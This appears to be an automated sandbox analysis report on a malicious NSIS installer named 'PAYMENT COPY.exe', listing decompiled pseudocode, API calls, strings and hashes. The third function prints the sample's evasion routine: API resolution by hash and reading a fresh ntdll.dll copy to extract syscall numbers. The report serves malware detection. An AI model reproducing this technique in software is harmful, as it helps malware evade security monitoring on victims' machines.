                                                                    • String ID: "C:\Users\user\Desktop\PAYMENT COPY.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
                                                                    • API String ID: 1975747703-2457380892
                                                                    • Opcode ID: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                    • Instruction ID: 8734c0f5f73e26911640e72846d54346a9337973c4420bd4a4a6803de24d7ebf
                                                                    • Opcode Fuzzy Hash: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                    • Instruction Fuzzy Hash: 1B61C6702042007EE620BF669D46F373AACDB4474DF94443FF945B62E2CA7DA9068A2D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 208memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E00402EF1(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				intOrPtr _t100;
				void* _t104;
				intOrPtr _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42f450 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\frontdesk\\Desktop\\PAYMENT COPY.exe", 0x400);
				_t104 = E00405DE6("C:\\Users\\frontdesk\\Desktop\\PAYMENT COPY.exe", 0x80000000, 3);
				 *0x40a018 = _t104;
				if(_t104 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040624D("C:\\Users\\frontdesk\\Desktop", "C:\\Users\\frontdesk\\Desktop\\PAYMENT COPY.exe");
				E0040624D(0x437000, E00405C2C("C:\\Users\\frontdesk\\Desktop"));
				_t54 = GetFileSize(_t104, 0);
				 *0x429470 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E52(1);
					if( *0x42f458 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						_t105 = 8;
						 *0x415458 = 0x40d450;
						 *0x415454 = 0x40d450;
						 *0x40b8b0 = _t105;
						 *0x40bdcc = 0;
						 *0x40bdc8 = 0;
						 *0x415450 = 0x415450; // executed
						E00405E15( &_v300, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E0040343E( *0x42f458 + 0x1c);
							 *0x429474 = _t65;
							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x42f454 = _t110;
								 *0x42f45c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42f460 =  *0x42f460 + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t100 = _t105;
								do {
									_t70 = _t70 - _t105;
									 *_t70 =  *_t70 + _t110;
									_t100 = _t100 - 1;
								} while (_t100 != 0);
								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
								E00405DA1(0x42f480, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E0040343E( *0x429460);
					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						if(E00403428(0x421460, _t106) == 0) {
							E00402E52(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f458 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L19;
						}
						E00405DA1( &_v40, 0x421460, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42f458 =  *0x429460;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x429470) {
							_v8 = E0040670D(_v8, 0x421460, _t106);
						}
						 *0x429460 =  *0x429460 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 != 0);
					goto L22;
				}
			}




























                                                                    0x00402eff
                                                                    0x00402f02
                                                                    0x00402f1c
                                                                    0x00402f21
                                                                    0x00402f34
                                                                    0x00402f39
                                                                    0x00402f3f
                                                                    0x00000000
                                                                    0x00402f41
                                                                    0x00402f52
                                                                    0x00402f63
                                                                    0x00402f6a
                                                                    0x00402f72
                                                                    0x00402f77
                                                                    0x00402f79
                                                                    0x00403067
                                                                    0x00403069
                                                                    0x00403075
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040307e
                                                                    0x004030aa
                                                                    0x004030af
                                                                    0x004030b5
                                                                    0x004030be
                                                                    0x004030bf
                                                                    0x004030c4
                                                                    0x004030d5
                                                                    0x004030db
                                                                    0x004030e1
                                                                    0x004030e7
                                                                    0x004030f1
                                                                    0x0040310c
                                                                    0x00403115
                                                                    0x0040311a
                                                                    0x00403139
                                                                    0x00403149
                                                                    0x0040315b
                                                                    0x00403160
                                                                    0x00403168
                                                                    0x00403175
                                                                    0x0040317d
                                                                    0x00403182
                                                                    0x00403184
                                                                    0x00403184
                                                                    0x0040318a
                                                                    0x0040318a
                                                                    0x0040318d
                                                                    0x0040318f
                                                                    0x0040318f
                                                                    0x00403191
                                                                    0x00403193
                                                                    0x00403193
                                                                    0x0040319d
                                                                    0x004031a9
                                                                    0x00000000
                                                                    0x004031ae
                                                                    0x00000000
                                                                    0x00403168
                                                                    0x00000000
                                                                    0x0040311c
                                                                    0x00403086
                                                                    0x00403098
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402f7f
                                                                    0x00402f7f
                                                                    0x00402f84
                                                                    0x00402f88
                                                                    0x00402f8f
                                                                    0x00402f96
                                                                    0x00402f98
                                                                    0x00402f98
                                                                    0x00402fa7
                                                                    0x00403128
                                                                    0x0040316a
                                                                    0x00000000
                                                                    0x0040316a
                                                                    0x00402fb3
                                                                    0x00403037
                                                                    0x0040303a
                                                                    0x0040303f
                                                                    0x00000000
                                                                    0x00403037
                                                                    0x00402fc0
                                                                    0x00402fc5
                                                                    0x00402fcd
                                                                    0x00402ff3
                                                                    0x00403002
                                                                    0x00403008
                                                                    0x0040300d
                                                                    0x00403013
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040301d
                                                                    0x00403025
                                                                    0x00403028
                                                                    0x0040302d
                                                                    0x0040302f
                                                                    0x0040302f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040301d
                                                                    0x00403040
                                                                    0x00403046
                                                                    0x00403056
                                                                    0x00403056
                                                                    0x00403059
                                                                    0x0040305f
                                                                    0x0040305f
                                                                    0x00000000
                                                                    0x00402f7f

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00402F05
                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PAYMENT COPY.exe,00000400), ref: 00402F21
                                                                      • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\PAYMENT COPY.exe,80000000,00000003), ref: 00405DEA
                                                                      • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAYMENT COPY.exe,C:\Users\user\Desktop\PAYMENT COPY.exe,80000000,00000003), ref: 00402F6A
                                                                    • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 004030AF
                                                                    Strings
                                                                    • C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402EFB, 004030CF
                                                                    • Null, xrefs: 00402FEA
                                                                    • Inst, xrefs: 00402FD8
                                                                    • Error launching installer, xrefs: 00402F41
                                                                    • soft, xrefs: 00402FE1
                                                                    • C:\Users\user\Desktop\PAYMENT COPY.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040316A
                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311C
                                                                    • "C:\Users\user\Desktop\PAYMENT COPY.exe" , xrefs: 00402EF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                    • String ID: "C:\Users\user\Desktop\PAYMENT COPY.exe" $C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PAYMENT COPY.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                    • API String ID: 2803837635-2034358056
                                                                    • Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                    • Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
                                                                    • Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                    • Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 75%
                                                                    			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C52(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405BE5(E0040624D(0x40a450, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x40a450);
					E0040624D();
				}
				E00406528(0x40a450);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004065C1(0x40a450);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405DC1(0x40a450);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DE6(0x40a450, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405374(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4e8;
						goto L32;
					} else {
						E0040624D(0x40ac50, 0x430000);
						E0040624D(0x430000, 0x40a450);
						E004062E0(_t75, 0x40ac50, 0x40a450, "C:\Users\FRONTD~1\AppData\Local\Temp\nsmD8C8.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E0040624D(0x430000, 0x40ac50);
						_t62 = E00405969("C:\Users\FRONTD~1\AppData\Local\Temp\nsmD8C8.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x40a450);
								_push(0xfffffffa);
								E00405374();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405374(0xffffffea,  *(_t85 - 8));
				 *0x42f514 =  *0x42f514 + 1;
				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x42f514 =  *0x42f514 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffee);
					} else {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffe9);
						lstrcatA(0x40a450,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x40a450);
					E00405969();
					goto L29;
				}
				goto L33;
			}
















                                                                    0x00401759
                                                                    0x00401760
                                                                    0x00401769
                                                                    0x0040176c
                                                                    0x0040176f
                                                                    0x00401774
                                                                    0x0040177c
                                                                    0x00401798
                                                                    0x0040177e
                                                                    0x0040177e
                                                                    0x0040177f
                                                                    0x0040177f
                                                                    0x0040179e
                                                                    0x004017a8
                                                                    0x004017a8
                                                                    0x004017ac
                                                                    0x004017af
                                                                    0x004017b4
                                                                    0x004017b6
                                                                    0x004017b8
                                                                    0x004017bd
                                                                    0x004017bd
                                                                    0x004017c8
                                                                    0x004017c8
                                                                    0x004017d9
                                                                    0x004017db
                                                                    0x004017db
                                                                    0x004017dc
                                                                    0x004017dc
                                                                    0x004017df
                                                                    0x004017e2
                                                                    0x004017e5
                                                                    0x004017e5
                                                                    0x004017ec
                                                                    0x004017fb
                                                                    0x00401800
                                                                    0x00401803
                                                                    0x00401806
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00401808
                                                                    0x0040180b
                                                                    0x00401865
                                                                    0x0040186a
                                                                    0x004015b0
                                                                    0x004027bf
                                                                    0x004027bf
                                                                    0x00402a5a
                                                                    0x00402a5d
                                                                    0x00402a5d
                                                                    0x00000000
                                                                    0x0040180d
                                                                    0x00401813
                                                                    0x0040181e
                                                                    0x0040182b
                                                                    0x00401836
                                                                    0x0040184c
                                                                    0x0040184c
                                                                    0x0040184f
                                                                    0x00000000
                                                                    0x00401855
                                                                    0x00401855
                                                                    0x00401856
                                                                    0x00401873
                                                                    0x00402a63
                                                                    0x00402a63
                                                                    0x00402a63
                                                                    0x00401858
                                                                    0x00401858
                                                                    0x00401859
                                                                    0x00401492
                                                                    0x00402387
                                                                    0x00402387
                                                                    0x00402387
                                                                    0x00401856
                                                                    0x0040184f
                                                                    0x00402a65
                                                                    0x00402a69
                                                                    0x00402a69
                                                                    0x00401883
                                                                    0x00401888
                                                                    0x00401896
                                                                    0x0040189b
                                                                    0x004018a1
                                                                    0x004018a5
                                                                    0x004018a7
                                                                    0x004018af
                                                                    0x004018bb
                                                                    0x004018a9
                                                                    0x004018a9
                                                                    0x004018ad
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004018ad
                                                                    0x004018c4
                                                                    0x004018ca
                                                                    0x004018cc
                                                                    0x00000000
                                                                    0x004018d2
                                                                    0x004018d2
                                                                    0x004018d5
                                                                    0x004018ed
                                                                    0x004018d7
                                                                    0x004018da
                                                                    0x004018e3
                                                                    0x004018e3
                                                                    0x004018f2
                                                                    0x004018f7
                                                                    0x00402382
                                                                    0x00000000
                                                                    0x00402382
                                                                    0x00000000

                                                                    APIs
                                                                    • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                      • Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A
                                                                      • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                      • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                      • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                      • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\nsmD8C8.tmp\System.dll$Call
                                                                    • API String ID: 1941528284-1909268955
                                                                    • Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                    • Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
                                                                    • Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                    • Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 72C33723, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 69%
                                                                    			E72C33723(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v80;
				signed char _v84;
				long _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				char _v108;
				short _t141;
				short _t142;
				short _t143;
				short _t144;
				short _t145;
				short _t146;
				short _t147;
				short _t148;
				short _t149;
				int _t165;
				signed int _t169;
				intOrPtr _t175;
				signed int _t195;
				signed int _t210;
				signed int _t222;

				_v24 = _v24 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t141 = 0x6e;
				_v108 = _t141;
				_t142 = 0x74;
				_v106 = _t142;
				_t143 = 0x64;
				_v104 = _t143;
				_t144 = 0x6c;
				_v102 = _t144;
				_t145 = 0x6c;
				_v100 = _t145;
				_t146 = 0x2e;
				_v98 = _t146;
				_t147 = 0x64;
				_v96 = _t147;
				_t148 = 0x6c;
				_v94 = _t148;
				_t149 = 0x6c;
				_v92 = _t149;
				_v90 = 0;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t23 =  &_v44;
				 *_t23 = _v44 & 0x00000000;
				_t222 =  *_t23;
				_v20 = E72C345A0();
				_v64 = E72C34648(_v20, 0x8a111d91);
				_v68 = E72C34648(_v20, 0x170c1ca1);
				_v52 = E72C34648(_v20, 0xa5f15738);
				_v72 = E72C34648(_v20, 0x433a3842);
				_v56 = E72C34648(_v20, 0xd6eb2188);
				_v60 = E72C34648(_v20, 0x50a26af);
				_v80 = E72C34648(_v20, 0x55e38b1f);
				_v44 = 1;
				while(1) {
					_v16 = CreateFileW(E72C347A3(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
					if(_v16 == 0xffffffff) {
						break;
					}
					_v36 = _v68(_v16, 0);
					__eflags = _v36 - 0xffffffff;
					if(_v36 != 0xffffffff) {
						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
						__eflags = _v12;
						if(_v12 != 0) {
							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
							__eflags = _t165;
							if(_t165 != 0) {
								_v76 = _v12;
								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
								_t213 = _v32;
								_t68 = _t169 + 0x18; // 0x8000018
								_v40 = _v32 + _t68;
								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
								__eflags = _v24;
								if(_v24 != 0) {
									E72C345B8(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
									_v28 = _v28 & 0x00000000;
									while(1) {
										_t175 = _v32;
										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
											break;
										}
										E72C345B8(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
										_t210 = _v28 + 1;
										__eflags = _t210;
										_v28 = _t210;
									}
									_v48 = E72C34648(_v24, _a4);
									__eflags = _v48;
									if(_v48 != 0) {
										__eflags = _v16;
										if(_v16 != 0) {
											FindCloseChangeNotification(_v16);
										}
										__eflags = _v12;
										if(_v12 != 0) {
											VirtualFree(_v12, 0, 0x8000);
										}
										_v44 = _v44 & 0x00000000;
										__eflags = 0;
										if(0 != 0) {
											continue;
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
					L22:
					if(_v44 != 0) {
						if(_v16 != 0) {
							_v56(_v16);
						}
						_v80(0);
					}
					_v8 = _v48;
					while(1 != 0) {
						if(( *_v8 & 0x000000ff) != 0xb8) {
							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
							if(( *_v8 & 0x000000ff) != 0xe9) {
								__eflags = ( *_v8 & 0x000000ff) - 0xea;
								if(( *_v8 & 0x000000ff) != 0xea) {
									_t195 = _v8 + 1;
									__eflags = _t195;
									_v8 = _t195;
								} else {
									_v8 =  *(_v8 + 1);
								}
							} else {
								_t125 =  *(_v8 + 1) + 5; // 0x5
								_v8 = _v8 + _t125;
							}
							continue;
						} else {
						}
						break;
					}
					_v8 = _v8 + 1;
					_v84 =  *_v8;
					if(_v24 != 0) {
						VirtualFree(_v24, 0, 0x8000);
					}
					return _v84;
				}
				goto L22;
			}

















































                                                                    0x72c33729
                                                                    0x72c3372d
                                                                    0x72c33731
                                                                    0x72c33737
                                                                    0x72c33738
                                                                    0x72c3373e
                                                                    0x72c3373f
                                                                    0x72c33745
                                                                    0x72c33746
                                                                    0x72c3374c
                                                                    0x72c3374d
                                                                    0x72c33753
                                                                    0x72c33754
                                                                    0x72c3375a
                                                                    0x72c3375b
                                                                    0x72c33761
                                                                    0x72c33762
                                                                    0x72c33768
                                                                    0x72c33769
                                                                    0x72c3376f
                                                                    0x72c33770
                                                                    0x72c33776
                                                                    0x72c3377a
                                                                    0x72c3377e
                                                                    0x72c33782
                                                                    0x72c33786
                                                                    0x72c33786
                                                                    0x72c33786
                                                                    0x72c3378f
                                                                    0x72c3379f
                                                                    0x72c337af
                                                                    0x72c337bf
                                                                    0x72c337cf
                                                                    0x72c337df
                                                                    0x72c337ef
                                                                    0x72c337ff
                                                                    0x72c33802
                                                                    0x72c33809
                                                                    0x72c33828
                                                                    0x72c3382f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c3383e
                                                                    0x72c33841
                                                                    0x72c33845
                                                                    0x72c3385b
                                                                    0x72c3385e
                                                                    0x72c33862
                                                                    0x72c33878
                                                                    0x72c3387b
                                                                    0x72c3387d
                                                                    0x72c33887
                                                                    0x72c33893
                                                                    0x72c33899
                                                                    0x72c3389d
                                                                    0x72c338a0
                                                                    0x72c338a4
                                                                    0x72c338b9
                                                                    0x72c338bc
                                                                    0x72c338c0
                                                                    0x72c338d3
                                                                    0x72c338d8
                                                                    0x72c338e5
                                                                    0x72c338e5
                                                                    0x72c338ec
                                                                    0x72c338ef
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c3391a
                                                                    0x72c338e1
                                                                    0x72c338e1
                                                                    0x72c338e2
                                                                    0x72c338e2
                                                                    0x72c3392c
                                                                    0x72c3392f
                                                                    0x72c33933
                                                                    0x72c33937
                                                                    0x72c3393b
                                                                    0x72c33940
                                                                    0x72c33940
                                                                    0x72c33943
                                                                    0x72c33947
                                                                    0x72c33953
                                                                    0x72c33953
                                                                    0x72c33956
                                                                    0x72c3395a
                                                                    0x72c3395c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c33935
                                                                    0x00000000
                                                                    0x72c338c2
                                                                    0x00000000
                                                                    0x72c3387f
                                                                    0x00000000
                                                                    0x72c33864
                                                                    0x00000000
                                                                    0x72c33847
                                                                    0x72c33962
                                                                    0x72c33966
                                                                    0x72c3396c
                                                                    0x72c33971
                                                                    0x72c33971
                                                                    0x72c33976
                                                                    0x72c33976
                                                                    0x72c3397c
                                                                    0x72c3397f
                                                                    0x72c3398f
                                                                    0x72c33999
                                                                    0x72c3399e
                                                                    0x72c339b8
                                                                    0x72c339bd
                                                                    0x72c339cd
                                                                    0x72c339cd
                                                                    0x72c339ce
                                                                    0x72c339bf
                                                                    0x72c339c5
                                                                    0x72c339c5
                                                                    0x72c339a0
                                                                    0x72c339a9
                                                                    0x72c339ad
                                                                    0x72c339ad
                                                                    0x00000000
                                                                    0x00000000
